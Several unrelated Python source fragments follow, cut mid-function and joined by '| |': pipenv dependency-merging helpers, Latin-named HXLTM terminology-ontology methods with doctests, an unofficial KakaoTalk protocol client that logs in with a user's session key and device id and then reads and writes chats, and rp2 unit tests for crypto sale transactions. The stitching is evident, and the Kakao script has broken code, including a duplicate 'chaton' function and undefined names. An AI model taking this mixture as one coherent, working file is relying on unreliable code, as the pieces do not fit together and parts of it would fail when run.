"editable": lambda x: hasattr(x, "keys") and x.get("editable"),
}
for k, func in sections.items():
file_dict = split_section(file_dict, k, func)
return file_dict
def merge_deps(
file_dict,
project,
dev=False,
requirements=False,
ignore_hashes=False,
blocking=False,
only=False,
):
"""
Given a file_dict, merges dependencies and converts them to pip dependency lists.
:param dict file_dict: The result of calling :func:`pipenv.utils.split_file`
:param :class:`pipenv.project.Project` project: Pipenv project
:param bool dev=False: Flag indicating whether dev dependencies are to be installed
:param bool requirements=False: Flag indicating whether to use a requirements file
:param bool ignore_hashes=False:
:param bool blocking=False:
:param bool only=False:
:return: Pip-converted 3-tuples of [deps, requirements_deps]
"""
deps = []
requirements_deps = []
for section in list(file_dict.keys()):
# Turn develop-vcs into ['develop', 'vcs']
section_name, suffix = (
section.rsplit("-", 1)
if "-" in section and not section == "dev-packages"
else (section, None)
)
if not file_dict[section] or section_name not in (
"dev-packages",
"packages",
"default",
"develop",
):
continue
is_dev = section_name in ("dev-packages", "develop")
if is_dev and not dev:
continue
if ignore_hashes:
for k, v in file_dict[section]:
if "hash" in v:
del v["hash"]
# Block and ignore hashes for all suffixed sections (vcs/editable)
no_hashes = True if suffix else ignore_hashes
block = True if suffix else blocking
include_index = True if not suffix else False
converted = convert_deps_to_pip(
file_dict[section], project, r=False, include_index=include_index
)
deps.extend((d, no_hashes, block) for d in converted)
if dev and is_dev and requirements:
requirements_deps.extend((d, no_hashes, block) for d in converted)
return deps, requirements_deps
def recase_file(file_dict):
"""Recase file before writing to output."""
if "packages" in file_dict or "dev-packages" in file_dict:
sections = ("packages", "dev-packages")
elif "default" in file_dict or "develop" in file_dict:
sections = ("default", "develop")
for section in sections:
file_section = file_dict.get(section, {})
# Try to properly case each key if we can.
for key in list(file_section.keys()):
try:
cased_key = proper_case(key)
except IOError:
cased_key = key
file_section[cased_key] = file_section.pop(key)
return file_dict
def get_windows_path(*args):
"""Sanitize a path for windows environments
Accepts an arbitrary list of arguments and makes a clean windows path"""
return os.path.normpath(os.path.join(*args))
def find_windows_executable(bin_path, exe_name):
"""Given an executable name, search the given location for an executable"""
requested_path = get_windows_path(bin_path, exe_name)
if os.path.isfile(requested_path):
return requested_path
try:
pathext = os.environ["PATHEXT"]
except KeyError:
pass
else:
for ext in pathext.split(os.pathsep):
path = get_windows_path(bin_path, exe_name + ext.strip().lower())
if os.path.isfile(path):
return path
return find_executable(exe_name)
def path_to_url(path):
from ._compat import Path
return Path(normalize_drive(os.path.abspath(path))).as_uri()
def | |
default ([Any], optional): Value if not found. Defaults to None.
fontem (dict): An nested object to search
Returns:
[Any]: Return the result. Defaults to default
"""
if fontem is None:
fontem = self.crudum
keys = dotted_key.split('.')
return reduce(
lambda d, key: d.get(
key) if d else default, keys, fontem
)
def quod_aliud(self, aliud_typum: str, aliud_valorem: str) -> Dict:
"""Quod Aliud?
Requīsītum:
- *.hxmtm.yml:ontologia_aliud
- *.hxmtm.yml:ontologia_aliud_familiam
Args:
aliud_typum (str):
aliud valōrem
aliud_valōrem (str):
aliud valōrem
Returns:
Dict: Python Dict, de *.hxltm.yml
Exemplōrum gratiā (et Python doctest, id est, testum automata):
>>> ontologia = HXLTMTestumAuxilium.ontologia()
>>> 'UTX_adverb' in ontologia.\
quod_aliud('partem_orationis', 'lat_adverbium')['aliud']
True
>>> ontologia.\
quod_aliud('partem_orationis', 'lat_adverbium')['codicem_TBX']
'adverb'
"""
if aliud_typum not in self.crudum['ontologia_aliud'] or \
aliud_valorem not in \
self.crudum['ontologia_aliud'][aliud_typum]:
return None
resultatum = self.crudum['ontologia_aliud'][aliud_typum][aliud_valorem]
if '_aliud' in resultatum and resultatum['_aliud']:
resultatum['aliud'] = \
list(map(str.strip, resultatum['_aliud'].split('|')))
else:
# _[eng-Latn]Alias without aliases to other types?[eng-Latn]_
resultatum['aliud'] = []
aliud_familiam = self.crudum['ontologia_aliud_familiam'].keys()
# print('aliud_familiam', aliud_familiam)
for familiam in aliud_familiam:
if aliud_valorem.startswith(familiam + '_'):
resultatum['_aliud_familiam'] = familiam
for aliud in resultatum['aliud']:
# _[eng-Latn]
# Only create a codicem_TTTT if *.hxmtl.yml already not have
# one.
# [eng-Latn]_
if aliud.startswith(familiam + '_') and \
not 'codicem_' + familiam in resultatum:
resultatum['codicem_' + familiam] = \
aliud.replace(familiam + '_', '')
# print(' > quod_aliud resultatum', resultatum)
return resultatum
def quod_aliud_de_multiplum(
self,
aliud_typum: str,
aliud_valorem_multiplum: Union[List[str], str]
) -> Dict:
"""Quod Aliud de multiplum optiōnem?
_[eng-Latn]
HXLTM (when not working with RAW JSON) allows make simpler short
aliases from multiple standards, like:
'UTX_properNoun | TBX_noun'
In such way that it actually allows to make inferences about other
types implicitly even when some things are obvious
(like a 'proper noun' must be a 'noun').
When a field alredy not explicitly define an exact value, we
'try smart inferences', but if the initial input do already have
something wrong (but more specific for an output format) this
method will not override the more explicity alias.
Advanced checks (like bad tagging) should be done in another step.
[eng-Latn]_
Requīsītum:
- *.hxmtm.yml:ontologia_aliud
- *.hxmtm.yml:ontologia_aliud_familiam
Args:
aliud_typum (str):
aliud valōrem
aliud_valorem_multiplum (Union(List[str], str)):
aliud valōrem
Returns:
Dict: Python Dict, de *.hxltm.yml
Exemplōrum gratiā (et Python doctest, id est, testum automata):
>>> ontologia = HXLTMTestumAuxilium.ontologia()
>>> testum_I = ontologia.quod_aliud_de_multiplum(
... 'rem_statum',
... ['lat_rem_finale', 'UTX_provisional', 'XLIFF_initial'])
>>> testum_I
{'_conjecturum': ['TBX_preferred'], '_crudum_originale': \
['lat_rem_finale', 'UTX_provisional', 'XLIFF_initial'], \
'codicem_TBX': 'preferred', \
'codicem_UTX': 'provisional', \
'codicem_XLIFF': 'initial', \
'codicem_lat': 'rem_finale'}
>>> testum_II = ontologia.quod_aliud_de_multiplum(
... 'rem_statum',
... ['lat_rem_finale'])
>>> testum_II
{'_conjecturum': ['TBX_preferred', 'UTX_approved', 'XLIFF_final'], \
'_crudum_originale': ['lat_rem_finale'], \
'codicem_TBX': 'preferred', \
'codicem_UTX': 'approved', \
'codicem_XLIFF': 'final', \
'codicem_lat': 'rem_finale'}
"""
if not aliud_valorem_multiplum or len(aliud_valorem_multiplum) == 0:
return None
if isinstance(aliud_valorem_multiplum, str):
aliud_valorem_multiplum = list(map(
str.strip,
aliud_valorem_multiplum.split('|')))
# aliud_valorem_multiplum.sort(key=str.lower)
resultatum = {
'_crudum_originale': aliud_valorem_multiplum,
'_conjecturum': []
}
aliud_familiam = set(
sorted(self.crudum['ontologia_aliud_familiam'].keys(),
key=str.lower)
)
aliud_secundum = set()
for item in aliud_valorem_multiplum:
rem = self.quod_aliud(aliud_typum, item)
if rem is None or '_aliud_familiam' not in rem:
# print('not in rem')
continue
resultatum['codicem_' + rem['_aliud_familiam']] = \
rem['codicem_' + rem['_aliud_familiam']]
aliud_familiam.discard(rem['_aliud_familiam'])
if 'aliud' in rem and len(rem['aliud']) > 0:
aliud_secundum.update(rem['aliud'])
# print(rem['_aliud_familiam'])
# aliud.append(rem)
if len(aliud_secundum) > 0:
# print('>0', aliud_secundum)
for item in aliud_secundum:
rem = self.quod_aliud(aliud_typum, item)
if rem is None or '_aliud_familiam' not in rem:
continue
if 'codicem_' + rem['_aliud_familiam'] in resultatum:
# print('iam exsistit: ', item)
continue
# print('conjectūrum!: ', item)
resultatum['_conjecturum'].append(item)
resultatum['codicem_' + rem['_aliud_familiam']] = \
rem['codicem_' + rem['_aliud_familiam']]
resultatum['_conjecturum'].sort(key=str.lower)
resultatum = dict(OrderedDict(sorted(resultatum.items())))
# print('')
# print('resultatum', resultatum)
# print('')
return resultatum
def quod_formatum_excerptum(self) -> Dict:
"""Quod fōrmātum excerptum?
_[eng-Latn]
Return fōrmātum excerptum (the formatum_excerptum from Ontologia)
[eng-Latn]_
Trivia:
- fōrmātum, https://en.wiktionary.org/wiki/formatus#Latin
- excerptum, https://en.wiktionary.org/wiki/excerptus#Latin
Returns:
Dict: fōrmātum excerptum
"""
if self.crudum and 'formatum_excerptum' in self.crudum:
return self.crudum['formatum_excerptum']
return {}
def quod_globum_valorem(self) -> Dict:
"""Quod globum valorem?
_[eng-Latn]
Return global variables (for Ontologia)
[eng-Latn]_
Trivia:
- globum, https://en.wiktionary.org/wiki/globus#Latin
- valōrem, https://en.wiktionary.org/wiki/valor#Latin
Returns:
Dict: globum valorem
"""
# TODO: HXLTMOntologia.quod_globum_valorem is a draft.
# resultatum = {}
# return resultatum
return self.crudum
def quod_rem_statum(self,
statum_rem_accuratum: int = None,
statum_rem_textum: str = '',
rem_json: Union[str, Dict] = None
) -> Dict:
"""[summary]
Args:
statum_rem_accuratum (int, optional):
Statum rem accūrātum. Defallo Python None.
statum_rem_textum (str, optional):
Statum rem textum. Defallo vacuum textum.
Returns:
Dict: [description]
"""
# TODO: make the defaults configurable
resultatum = {
# 1-10, TBX uses it
'accuratum': statum_rem_accuratum,
# 'crudum': [],
'crudum_originale': [],
# initial, translated, reviewed, final
'XLIFF': 'initial',
# provisional, approved, '', non-standard, rejected, obsolete
'UTX': 'provisional'
}
if rem_json:
raise NotImplementedError('quod_rem_statum rem_json')
if statum_rem_textum != '':
crudum_originale = statum_rem_textum.split('|')
resultatum['crudum_originale'] = crudum_originale
# scālam, https://en.wiktionary.org/wiki/scala#Latin
# TODO: implement this check
return resultatum
def quod_xml_typum(self,
radicem_tag: str,
radicem_attributum: dict = None
) -> Dict:
"""quod_xml_typum Quod XML typum est?
_[eng-Latn]
TODO: make this method actually load the references from the
*.hxltm.yml, so the users could have at least some freedom
(as they already have when exporting) but now to import.
[eng-Latn]_
Args:
radicem_tag (str):
XML rādīcem (textum)
radicem_attributum (dict, optional):
HXL attribūtum de rādīcem. Defallo Python None
Returns:
Dict: typum, versiōnem, variāns
"""
resultatum = {
'hxltm_normam': '',
'typum': 'XML',
# XLIFF 2.x may provide srcLang / trgLang on <xliff>
'linguam_fontem': '',
'linguam_fontem_attributum': '',
'linguam_objectivum': '',
'linguam_objectivum_attributum': '',
'radicem_attributum_crudum': {},
# variāns, https://en.wiktionary.org/wiki/varians#Latin
'varians': '',
'versionem': -1
}
# def hxl_attr(clavem):
# if not clavem or clavem.find('}') == -1:
# return clavem
# return clavem.split('}')[-1]
attributum = radicem_attributum if radicem_attributum else {}
if radicem_attributum:
for clavem in list(radicem_attributum):
clavem_basim = HXLTMUtil.xml_clavem_breve(clavem)
if clavem_basim != clavem and \
clavem_basim not in radicem_attributum:
attributum[clavem_basim] = radicem_attributum[clavem]
resultatum['radicem_attributum_crudum'] = \
radicem_attributum
radicem_tag_basim = HXLTMUtil.xml_clavem_breve(radicem_tag)
# print('attributum', attributum)
# print('quod_xml_typum', radicem_tag, radicem_attributum,
# resultatum, radicem_tag_basim)
if radicem_tag_basim == 'tmx':
resultatum['hxltm_normam'] = 'TMX'
resultatum['typum'] = 'TMX'
resultatum['versionem'] = '1.4'
if radicem_tag_basim == 'martif':
resultatum['hxltm_normam'] = 'TBX-Basim'
resultatum['typum'] = 'TBX'
resultatum['versionem'] = 'TBX-Basic'
if radicem_tag_basim == 'tbx':
resultatum['hxltm_normam'] = 'TBX-IATE'
resultatum['typum'] = 'TBX'
resultatum['versionem'] = 'TBX-IATE'
if radicem_tag_basim == 'xliff':
resultatum['hxltm_normam'] = 'XLIFF'
resultatum['typum'] = 'XLIFF'
resultatum['linguam_fontem_attributum'] = 'srcLang'
resultatum['linguam_objectivum_attributum'] = 'trgLang'
if 'version' in attributum:
resultatum['versionem'] = attributum['version']
if str(resultatum['versionem']).startswith('1.'):
resultatum['hxltm_normam'] = 'XLIFF-obsoletum'
resultatum['linguam_fontem_attributum'] = 'lang'
resultatum['linguam_objectivum_attributum'] = 'lang'
if 'version' in attributum:
resultatum['versionem'] = attributum['version']
if 'type' in attributum:
resultatum['varians'] = attributum['type']
if 'srcLang' in attributum:
resultatum['linguam_fontem'] = attributum['srcLang']
if 'trgLang' in attributum:
resultatum['linguam_objectivum'] = attributum['trgLang']
return resultatum
def quod_xml_typum_tag(
self,
hxltm_normam: str
) -> Dict:
"""quod_xml_typum Quod XML typum est?
_[eng-Latn]
TODO: make this method actually load the references from the
*.hxltm.yml, so the users could have at least some freedom
(as they already have when exporting) but now to import.
[eng-Latn]_
Args:
hxltm_normam (str):
HXLTM normam (textum)
Returns:
Dict: typum, versiōnem, variāns
"""
resultatum = {
'conceptum_signum': '',
'conceptum_attributum': 'id',
'fontem': '',
'terminum': '',
'objectivum': ''
}
if hxltm_normam == 'TBX-Basim':
# <termEntry id="L10N_ego_codicem">
# <langSet xml:lang="la">
# <tig>
# <term>lat-Latn</term>
# </tig>
# </langSet>
# </termEntry>
resultatum['conceptum_signum'] = 'termEntry'
resultatum['terminum'] = 'langSet/tig/term'
if hxltm_normam == 'TBX-IATE':
# <conceptEntry id="254003">
# <descrip type="subjectField">linguistics</descrip>
# <langSec xml:lang="es">
# <termSec>
# <term>acto de habla indirecto</term>
# <termNote type="termType">fullForm</termNote>
# <descrip type="reliabilityCode">1</descrip>
# </termSec>
# </langSec>
# </conceptEntry>
resultatum['conceptum_signum'] = 'conceptEntry'
resultatum['terminum'] = 'langSec/termSec/term'
if hxltm_normam == 'TMX':
# <tu tuid="L10N_ego_codicem">
# <tuv xml:lang="la">
# <seg>lat-Latn</seg>
# </tuv>
# </tu>
resultatum['conceptum_signum'] = 'tu'
resultatum['conceptum_attributum'] = 'tuid' # Non 'id'
resultatum['terminum'] = 'tuv/seg'
if hxltm_normam == 'XLIFF':
# <xliff version="2.0"
# xmlns="urn:oasis:names:tc:xliff:document:2.0"
# xmlns:fs="urn:oasis:names:tc:xliff:fs:2.0"
# xmlns:val="urn:oasis:names:tc:xliff:validation:2.0"
# srcLang="pt"
# trgLang="es">
#
# (...)
#
# <unit id="L10N_ego_scriptum_nomen">
# <segment state="final">
# <source>Alfabeto latino</source>
# <target>Alfabeto latino</target>
# </segment>
# </unit>
resultatum['conceptum_signum'] = 'unit'
# resultatum['fontem'] = 'segment/source'
resultatum['fontem'] = 'source'
# resultatum['objectivum'] = 'segment/target'
resultatum['objectivum'] = 'target'
if hxltm_normam == 'XLIFF-obsoletum':
# <trans-unit id="L10N_ego_codicem" translate="no" approved="yes">
# <source>por-Latn</source>
# <target state="final">spa-Latn</target>
# <note annotates="source" priority="2">
# _ [eng-Latn]eng-Latn[eng-Latn]_
# </note>
# </trans-unit>
resultatum['conceptum_signum'] = 'trans-unit'
resultatum['fontem'] = 'source'
resultatum['objectivum'] = 'target'
return resultatum
@staticmethod
def quid_est_hashtag_circa_conceptum(
hxl_hashtag: str) -> Union[bool, None]:
"""Quid est hashtag circa +conceptum?
_[eng-Latn]
Is this hashtag about concept level?
[eng-Latn]
Args:
hxl_hashtag (str): Hashtag ad textum
Returns:
bool:
"""
# TODO: make | |
<filename>kakao/kakao.py
import sys
import struct
import base64
import rsa as RSA
import socket
import bson
import json
import urllib, urllib2
import httplib
from bson import BSON
from bson.py3compat import b
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
encoder = PKCS7Encoder()
aes_key='\<KEY>'
sKey = u'' # you need to know sKey for your current account
duuid = u'' # you need to know duuid for your current account
user_id = '' # this is not necessary for most of the commands
def get_list():
global duuid, sKey
if duuid == u'':
print "[x] ERROR: duuid is not defined"
return
elif sKey == u'':
print "[x] ERROR: sKey is not defined"
return
print "[$] START GET"
url = 'https://ch-talk.kakao.com/android/chats/list.json'
headers = { 'GET' : '/android/chats/list.json',
'HOST' : 'ch-talk.kakao.com',
'Connection' : 'Close',
'Accept-Language' : 'ko',
'Content-Transfer-Encoding' : 'UTF-8',
'User-Agent' : 'KakaoTalkAndroid/3.8.7 Android/4.1.2',
'A' : 'android/3.8.7/ko',
'S' : sKey + '-' + duuid,
'Cache-Control' : 'no-cache',
'Content-Type' : 'application/x-www-form-urlencoded',
'Content-Length' : '0' }
request = urllib2.Request(url, None, headers)
response = urllib2.urlopen(request)
data = response.read()
data = json.loads(data ,encoding='utf-8')
return data['chatRooms']
def start():
global duuid, sKey
if duuid == u'':
print "[x] ERROR: duuid is not defined"
return
elif sKey == u'':
print "[x] ERROR: sKey is not defined"
return
elif user_id == '':
print "[x] ERROR: user_id is not defined"
return
print "[*] START SOCKET"
document = checkin() # android
host = document['host']
port = document['port']
print "[!] HOST : " + host
print "[!] PORT : " + str(port)
h = hand()
l = login()
enc_l = enc_aes(l)
command = struct.pack('I',len(enc_l)) + enc_l
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(host),port))
s.settimeout(5)
s.send(h + command)
try:
reply = s.recv(40960)
hex_secure(reply)
except:
print "[x] START ERROR "
for e in sys.exc_info():
print e
sys.exit(1)
return s
def hex_secure(data):
dec_h = dec_aes(data[4:])
print ' [' + dec_h[6:17] + ']',
print hex_to_dic(encoder.decode(dec_h[22:]))
def hex_string(data):
data = data.split('}')[0].replace('\n','').replace(', 0x','\\x').strip().replace('0x','\\x').decode("string-escape")
dec_h = dec_aes(data[4:])
def hex_nosecure(h):
print '[' + h[6:17] + ']',
print hex_to_dic(encoder.decode(h[22:]))
def checkin():
global user_id
if user_id == '':
print "[x] ERROR: user_id is not defined"
return
new = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
new.connect(('172.16.58.3', 5228))
data = '\x12\x27\x00\x00' # Packet ID (4)
data += '\x00\x00' # Status Code (2)
data += 'CHECKIN\x00\x00\x00\x00' # Method (11)
data += '\x00' # Body Type (1)
body = BSON.encode({u'useSub': True, u'ntype': 3, u'userId': user_id, u'MCCMNC': None, u'appVer': u'3.8.7', u'os': u'android'})
data += body[:4] # Body Length (4)
data += body # Body Contents
new.sendall(data)
reply = new.recv(20480)
bs = reply[22:]
(document, _) = bson._bson_to_dict(bs,dict, True, bson.OLD_UUID_SUBTYPE)
print "[*] CHECKIN"
return document
def buy():
new = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
new.connect(('172.16.58.3', 5228))
data = '\x01\x00\x00\x00' # Packet ID (4)
data += '\x00\x00' # Status Code (2)
data += 'BUY\x00\x00\x00\x00\x00\x00\x00\x00' # Method (11)
data += '\x00' # Body Type (1)
body = BSON.encode({u'ntype': 3, u'countryISO': u'US', u'userId': user_id, u'MCCMNC': None, u'appVer': u'3.8.7', u'os': u'android', u'voip': False})
data += body[:4] # Body Length (4)
data += body # Body Contents
new.sendall(data)
reply = new.recv(4096)
bs = reply[22:]
(document, _) = bson._bson_to_dict(bs,dict, True, bson.OLD_UUID_SUBTYPE)
print "[*] BUY"
return document
def enc_rsa(secret):
n = <KEY>
e = 3
pub_key = RSA.PublicKey(n, e)
enc_key = RSA.encrypt(secret, pub_key)
return enc_key
def hand():
hand = '\x80\x00\x00\x00'
hand += '\x01\x00\x00\x00' # RSA = 1, DH = 2
hand += '\x01\x00\x00\x00' # AES_CBC=1, AES_CFB128=2, AES_OFB128=3, RC4=4
hand += enc_rsa(aes_key)
return hand
def command_send(s, data):
enc_data = enc_aes(data)
command = struct.pack('I',len(enc_data)) + enc_data
s.send(command)
try:
reply = s.recv(40960)
hex_secure(reply)
except:
print "[x] ERROR "
for e in sys.exc_info():
print e
return False
return True
def login():
global duuid, sKey
if duuid == u'':
print "[x] ERROR: duuid is not defined"
return
elif sKey == u'':
print "[x] ERROR: sKey is not defined"
return
print " [*] LOGIN"
data = '\x14\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'LOGIN\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'opt': u'', u'prtVer': u'1.0', u'appVer': u'1.5.0', u'os': u'wp', u'lang': u'ko', u'sKey': sKey, u'duuid': duuid, u'ntype': 3, u'MCCMNC': None})
body = BSON.encode({u'opt': u'', u'prtVer': u'1.0', u'appVer': u'3.8.7', u'os': u'android', u'lang': u'en', u'sKey': sKey, u'duuid': duuid, u'ntype': 3, u'MCCMNC': None})
data += body[:4]
data += body
return data
def chaton(s, chatId):
msg = " [*] CHATON : " + str(chatId)
#print msg
data = '\x05\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'CHATON\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'chatId': chatId})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
def nchatlist(s):
print " [*] NCHATLIST"
data = '\x06\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'NCHATLIST\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'maxIds': [], u'chatIds': []})
data += body[:4]
data += body
enc_data = enc_aes(data)
command = struct.pack('I',len(enc_data)) + enc_data
s.send(command)
reply = ''
while True:
try:
new = s.recv(1024)
reply += new
except socket.timeout:
break
while True:
try:
dec_h = dec_aes(reply[4:hex_to_num(reply[:4])+4])
reply = reply[hex_to_num(reply[:4])+4:]
result = dec_packet(dec_h)
print " [-]" + result['command'],
b = result['body']
print " from " + b['chatLog']['authorId'] + '('+ b[authorNickname] + ') : ' + b['chatLog']['message']
except:
break
return True
#succ = command_send(s, data)
#return succ
def leave(s, chatId):
print " [*] LEAVE from " + str(chatId)
data = '\x06\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'LEAVE\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'chatId': chatId})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
#[CHATON] {u'chatId': }
def chaton(s, chatId):
print " [*] CHATON from " + str(chatId)
data = '\x07\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'CHATON\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'chatId': chatId})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
#[PING]
def ping(s):
print " [*] PING"
data = '\x09\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'PING\x00\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
data += '\x00\x00\x00\x00\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a'
succ = command_send(s, data)
return succ
#[UPSEEN] {u'status': 0, u'isOK': True, u'errMsg': None}
def upseen(s, chatId):
print " [*] UPSEEN from " + str(chatId)
data = '\x08\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'UPSEEN\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'max': 0L, u'cnt': 5, u'cur': 0L, u'chatId': chatId})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
#[READ] {u'since': 0L, u'chatId': }
def read(s, chatId = chatId):
print " [*] READ from " + str(chatId)
data = '\x06\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'READ\x00\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'chatId': chatId, u'since': 462937779245527040L})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
def write(s, chatId, msg = u'test'):
try:
print " [*] WRITE to " + str(chatId) + " : " + str(msg)
except:
print " [*] WRITE to " + str(chatId) + " : ???"
data = '\x06\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'WRITE\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'chatId': chatId, u'msg': msg, u'extra': None, u'type': 1})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
#write_pic(s, url=upload_pic())
def write_pic(s, chatId = 42865071710223L, url = "", width = 800, height = 600):
print " [*] WRITE PICTURE to " + str(chatId) + | |
<reponame>houqp/rp2
# Copyright 2021 eprbell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
from dateutil.tz import tzoffset
from rp2.configuration import Configuration
from rp2.entry_types import TransactionType
from rp2.intra_transaction import IntraTransaction
from rp2.out_transaction import OutTransaction
from rp2.plugin.country.us import US
from rp2.rp2_decimal import RP2Decimal
from rp2.rp2_error import RP2TypeError, RP2ValueError
class TestOutTransaction(unittest.TestCase):
_configuration: Configuration
@classmethod
def setUpClass(cls) -> None:
TestOutTransaction._configuration = Configuration("./config/test_data.config", US())
def setUp(self) -> None:
self.maxDiff = None # pylint: disable=invalid-name
def test_taxable_out_transaction(self) -> None:
out_transaction: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
OutTransaction.type_check("my_instance", out_transaction)
self.assertTrue(out_transaction.is_taxable())
self.assertEqual(RP2Decimal("1981.98"), out_transaction.fiat_taxable_amount)
self.assertEqual(RP2Decimal("2.2"), out_transaction.crypto_taxable_amount)
self.assertEqual("38", out_transaction.internal_id)
self.assertEqual(2020, out_transaction.timestamp.year)
self.assertEqual(6, out_transaction.timestamp.month)
self.assertEqual(1, out_transaction.timestamp.day)
self.assertEqual(3, out_transaction.timestamp.hour)
self.assertEqual(59, out_transaction.timestamp.minute)
self.assertEqual(59, out_transaction.timestamp.second)
self.assertEqual(tzoffset(None, -14400), out_transaction.timestamp.tzinfo)
self.assertEqual("B1", out_transaction.asset)
self.assertEqual("Coinbase Pro", out_transaction.exchange)
self.assertEqual("Bob", out_transaction.holder)
self.assertEqual(TransactionType.SELL, out_transaction.transaction_type)
self.assertEqual(RP2Decimal("900.9"), out_transaction.spot_price)
self.assertEqual(RP2Decimal("2.2"), out_transaction.crypto_out_no_fee)
self.assertEqual(RP2Decimal("2.21"), out_transaction.crypto_balance_change)
self.assertEqual(RP2Decimal("1990.989"), out_transaction.fiat_balance_change)
self.assertEqual(
str(out_transaction),
"""OutTransaction:
id=38
timestamp=2020-06-01 03:59:59.000000 -0400
asset=B1
exchange=Coinbase Pro
holder=Bob
transaction_type=TransactionType.SELL
spot_price=900.9000
crypto_out_no_fee=2.20000000
crypto_fee=0.01000000
unique_id=
is_taxable=True
fiat_taxable_amount=1981.9800""",
)
self.assertEqual(
out_transaction.to_string(2, repr_format=False, extra_data=["foobar", "qwerty"]),
""" OutTransaction:
id=38
timestamp=2020-06-01 03:59:59.000000 -0400
asset=B1
exchange=Coinbase Pro
holder=Bob
transaction_type=TransactionType.SELL
spot_price=900.9000
crypto_out_no_fee=2.20000000
crypto_fee=0.01000000
unique_id=
is_taxable=True
fiat_taxable_amount=1981.9800
foobar
qwerty""",
)
self.assertEqual(
out_transaction.to_string(2, repr_format=True, extra_data=["foobar", "qwerty"]),
(
" OutTransaction("
"id='38', "
"timestamp='2020-06-01 03:59:59.000000 -0400', "
"asset='B1', "
"exchange='Coinbase Pro', "
"holder='Bob', "
"transaction_type=<TransactionType.SELL: 'sell'>, "
"spot_price=900.9000, "
"crypto_out_no_fee=2.20000000, "
"crypto_fee=0.01000000, "
"unique_id=, "
"is_taxable=True, "
"fiat_taxable_amount=1981.9800, "
"foobar, "
"qwerty)"
),
)
def test_out_transaction_equality_and_hashing(self) -> None:
out_transaction: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
out_transaction2: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
out_transaction3: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=7,
)
self.assertEqual(out_transaction, out_transaction)
self.assertEqual(out_transaction, out_transaction2)
self.assertNotEqual(out_transaction, out_transaction3)
self.assertEqual(hash(out_transaction), hash(out_transaction))
self.assertEqual(hash(out_transaction), hash(out_transaction2))
# These hashes would only be equal in case of hash collision (possible but very unlikey)
self.assertNotEqual(hash(out_transaction), hash(out_transaction3))
def test_bad_to_string(self) -> None:
out_transaction: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'indent' has non-integer value"):
out_transaction.to_string(None, repr_format=False, extra_data=["foobar", "qwerty"]) # type: ignore
with self.assertRaisesRegex(RP2ValueError, "Parameter 'indent' has non-positive value.*"):
out_transaction.to_string(-1, repr_format=False, extra_data=["foobar", "qwerty"])
with self.assertRaisesRegex(RP2TypeError, "Parameter 'repr_format' has non-bool value .*"):
out_transaction.to_string(1, repr_format="False", extra_data=["foobar", "qwerty"]) # type: ignore
with self.assertRaisesRegex(RP2TypeError, "Parameter 'extra_data' is not of type List"):
out_transaction.to_string(1, repr_format=False, extra_data="foobar") # type: ignore
def test_bad_out_transaction(self) -> None:
